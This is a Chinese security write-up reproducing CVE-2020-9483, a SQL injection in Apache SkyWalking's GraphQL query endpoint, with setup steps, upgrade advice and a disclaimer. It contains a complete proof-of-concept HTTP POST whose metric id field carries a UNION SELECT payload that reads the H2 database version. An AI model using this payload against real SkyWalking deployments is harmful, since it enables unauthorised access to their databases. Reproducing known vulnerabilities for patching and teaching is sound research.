简介
Apache Skywalking是一款针对分布式系统的应用程序性能监视工具,为微服务,云原生和基于容器(Docker,Kubernetes,Mesos)的体系结构而设计。
影响版本
Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0
环境搭建
这里下载6.5.0进行搭建
下载地址
https://archive.apache.org/dist/skywalking/6.5.0/apache-skywalking-apm-6.5.0.tar.gz进入bin目录并启动
cd apache-skywalking-apm-bin/bin/./startup.sh
访问http://your-ip:8080即可查看Skywalking的页面。
漏洞复现
构建数据包并发送
POST /graphql HTTP/1.1Host: ip:8080Content-Type: application/json;charset=utf-8Content-Length: 313Connection: close{"query":"query queryData($duration: Duration!) {globalP99: getLinearIntValues(metric: {name: "all_p99", id: "') UNION ALL SELECT NULL,CONCAT('~', H2VERSION(), '~')--" }, duration: $duration) { values { value } }}","variables":{"duration":{"start":"2020-08-07 1417","end":"2020-08-07 1418","step":"MINUTE"}}}
成功获取H2的版本信息
修复建议
升级到安全版本
下载地址
https://github.com/apache/skywalking/releases
本文始发于微信公众号(锋刃科技):Apache SkyWalking SQL注入漏洞(CVE-2020-9483)复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论